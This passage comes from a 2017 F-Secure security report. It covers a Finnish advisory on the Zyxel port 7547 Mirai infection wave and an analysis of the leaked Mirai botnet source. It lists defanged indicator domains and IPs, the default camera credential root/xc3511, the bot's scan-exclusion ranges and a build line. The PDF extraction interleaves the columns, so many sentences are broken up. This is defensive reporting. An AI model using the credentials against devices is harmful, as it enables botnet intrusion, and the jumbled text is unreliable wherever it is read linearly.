evices. ISPs generally plan to keep up the blocking domain : streetcarswedish[.]com (IDS) hostname : www[.]dyndn-web[.]com (IDS)
for a month after the software patches have become domain : absentvodka[.]com (IDS) hostname : www[.]riotrewards[.]com (IDS)
domain : applecards[.]xyz (IDS) hostname : www[.]securityupdates[.]us (IDS)
available. domain : checkforupdates[.]online (IDS) hostname : www[.]sillycatmouth[.]us (IDS)
domain : csgolime[.]com (IDS) hostname : x[.]csgolime[.]com (IDS)
Page 71
Appendix: NCSC-FIs Mirai Mitigation
hostname : 2x[.]csgolime[.]com (IDS) 1.5 Background Zyxel AMG1312-T10B Software update available
hostname : check[.]securityupdates[.]us (IDS) Zyxel AMG1202-T10B (End-of-life) Software update
hostname : dns2[.]hc0[.]me (IDS) Remote management of home routers that involve
hostname : horrayyy[.]dyndn-web[.]com (IDS) available
using open ports creates a vulnerability that can be
hostname : its1440549032s[.]dyndn-web[.]com (IDS) Zyxel P-660HN-T1A (End-of-life)
hostname : its1442030786s[.]dyndn-web[.]com (IDS) abused to infect devices. Attackers can exploit this
Zyxel P660HN-T1Av2 (End-of-life)
hostname : its1462361377s[.]dyndn-web[.]com (IDS) vulnerability to force infected devices to spread
ip-dst : 188[.]209[.]49[.]64 (IDS) It is very likely that other devices are affected by the
ip-dst : 212[.]92[.]127[.]146 (IDS) their infection to similar devices. Infected devices
same vulnerability. The manufacturer Zyxel is aware
ip-dst : 5[.]8[.]65[.]124 (IDS) are integrated together to form a botnet. Botnets
ip-dst : 5[.]188[.]232[.]1 (IDS) of the issue.
consisting of these infected devices can be used in
ip-dst : 5[.]188[.]232[.]134 (IDS)
ip-dst : 5[.]188[.]232[.]101 (IDS) various schemes, including launching DoS (denial-of-
ip-dst : 6[.]5[.]65[.]13 (IDS) service) attacks. The remote management of infected
ip-dst : 6[.]5[.]111[.]138 (IDS)
ip-dst : 62[.]113[.]238[.]138 (IDS) devices generally uses TCP port 7547.
ip-dst : 80[.]87[.]205[.]120 (IDS) Perttu Halonen
The scanning traffic caused by the recent infection
ip-dst : 89[.]34[.]104[.]230 (IDS) Information Security
ip-dst : 93[.]174[.]93[.]50 (IDS) wave began showing up on NCSC-FIs sensors on Specialist
ip-dst : 188[.]209[.]49[.]26 (IDS) 25 November 2016 at 13:30 UTC. The growth of the
ip-dst : 188[.]209[.]49[.]60 (IDS)
scanning traffic was very aggressive. Prior to the
recent infection wave, the daily amount of devices
1.4 Impact on users infected with Mirai in Finland was only a few hundred.
It is difficult for users to notice if their device has A day after the recent wave of infections began, the
been infected with the malware. An affected device number had grown to around 16,000.
probably uses the capacity of the users Internet Juhani Eronen
connection for denial-of-service (DoS) attacks, for FICORA considers that, in this case, the legal Chief Specialist
instance, without the user being aware of this. The conditions for filtering malicious traffic are fulfilled
malware may slow down the device or crash it. and recommends (but doesnt order) that telecom
operators filter traffic to port TCP 7547 to prevent
The user of the Internet subscription is responsible the exploitation of the vulnerability. Several telecom
for cleaning their infected devices. If necessary, a operators have started to filter traffic accordingly.
telecom operator may restrict outbound traffic to
block malware traffic. Users are advised to follow any 1.6 Vulnerable devices
directions provided by telecom operators. At this stage, the following ADSL modems
manufactured by Zyxel are known to be vulnerable.
Zyxel AMG1302-T10B Software update available
Zyxel AMG1302-T11C Software update available
Page 72
Appendix Jarkko Turkulainen
MIRAI is the malicious code used in recent DDoS to some, more than 500 000 of Dahua Technologys contains detailed instructions on how to build a bot
botnets. Its been linked with several high-profile chipset-based cameras are vulnerable to Mirais infrastructure (including the CnC).
attacks, such as the September 2016 attack on attacks based on their use of fixed credentials root/
computer security journalist Brian Krebs web site, xc3511 (see below). Furthermore, there are more Scanning method
an attack on French web host OVH, and the October credentials that have not been publicly analyzed yet, Infected devices brute-force random IP scans, and
2016 Dyn cyber attack. Mirai is one of the few high- so the total number of permanently vulnerable devices attempt Telnet access with precompiled sets of
profile malware families that has its own dedicated connected to the Internet may be considerably larger. credentials. However, some IP ranges are excluded:
wikipedia page. 127.0.0.0/8 - Loopback
Mirai source overview 0.0.0.0/8 - Invalid address space
The Mirai bot is written in C language, and targets Linux 3.0.0.0/8 - General Electric Company
As a C program, Mirai is very portable. In the source 15.0.0.0/7 - Hewlett-Packard Company
embedded platforms (such as IoT devices). Recently,
code repository, a precompiled set of bot binaries can 56.0.0.0/8 - US Postal Service
its source code was leaked - a copy of the source tree 6.0.0.0/8 - Department of Defense
be found for the following platforms:
is on github. The README in the source tree reveals 7.0.0.0/8 - Department of Defense
./dlr/release/dlr.m68k (Motorola 68000 series) 11.0.0.0/8 - Department of Defense
some insight into why the code was leaked: ./dlr/release/dlr.spc (Sparc processor architecture) 22.0.0.0/8 - Department of Defense
Greetz everybody, ./dlr/release/dlr.mpsl (MIPS64 processor architecture) 26.0.0.0/8 - Department of Defense
./dlr/release/dlr.mips (MIPS processor architecture) 28.0.0.0/8 - Department of Defense
When I first go in DDoS industry, I wasnt planning on staying in it ./dlr/release/dlr.arm7 (ARMv7 architecture) 29.0.0.0/8 - Department of Defense
long. I made my money, theres lots of eyes looking at IOT now, ./dlr/release/dlr.arm (ARM architecture) 30.0.0.0/8 - Department of Defense
so its time to GTFO. However, I know every skid and their mama, ./dlr/release/dlr.sh4 (Hitachi SuperH architecture) 33.0.0.0/8 - Department of Defense
its their wet dream to have something besides qbot. ./dlr/release/dlr.ppc (PowerPC architecture) 55.0.0.0/8 - Department of Defense
It should be noted that there is no x86-based 214.0.0.0/8 - Department of Defense
So today, I have an amazing release for you. With Mirai, I usually 215.0.0.0/8 - Department of Defense
pull max 380k bots from telnet alone. However, after the Kreb architecture build in the repository, indicating that 10.0.0.0/8 - Internal network
DDoS, ISPs been slowly shutting down and cleaning up their act. Mirai is targeted solely on the embedded/IoT devices. 192.168.0.0/16 - Internal network
Today, max pull is about 300k bots, and dropping. 172.16.0.0/14 - Internal network
In the build script, however there is the following line: 100.64.0.0/10 - IANA NAT reserved
i686-gcc -Os -D BOT_ARCH=\x86\ -D X32 -Wl,--gc-sections 169.254.0.0/16 - IANA NAT reserved
How big is Mirai? -fdata-sections -ffunction-sections -e __start -nostartfiles 198.18.0.0/15 - IANA Special use
What makes Mirai dangerous is the huge size of the -static main.c -o ./release/dlr.x86 224.*.*.*+ - Multicast
potential installation base, and the fact that some of The bots command-and-control U(CnC) is built
the devices are permanently vulnerable. According with the Go language. The source code repository
Page 73
Appendix: Mirai Source Code Analysis
Page 74
Appendix: Mirai Source Code Analysis
Page 75
This Report Was brought to you BY
F-Secure staff
Adam Pilkey, Alia Hilyati Ahmad Anuar, Andy Patel, Erka Koivunen,
Frederic Fritz Vila, Henri Lindberg, Henri Nurmi, Jarkko Turkulainen,
Jason Sattler, Karmina Aquino, Klas Kindstrm, Krzysztof Marciniak,
Leszek Tasiemski, Melissa Michael, Mikael Albrecht, Mikko Hyppnen,
Pivi Tynninen, Sean Sullivan, Siti Sarah Jamaludin, Tomi Tuominen
External contributors
Perttu Halonen, Juhani Eronen, Olaf Pursche, Martijn Grooten
WE SEE THINGS
OTHERS DONT
2017 F-Secure Corporation. All rights reserved. F-Secure and F -logo are registered trademarks of
F-Secure Corporation. F-Secure product and technology names and F-Secure logos are either trademarks
or registered trademarks of F-Secure Corporation. Other product names and logos referenced herein are
likely to be trademarks or registered trademarks of their respective owners.
Revision RTM 1.0
F-SECURE
State OF
Cyber
Security
2017
Share
report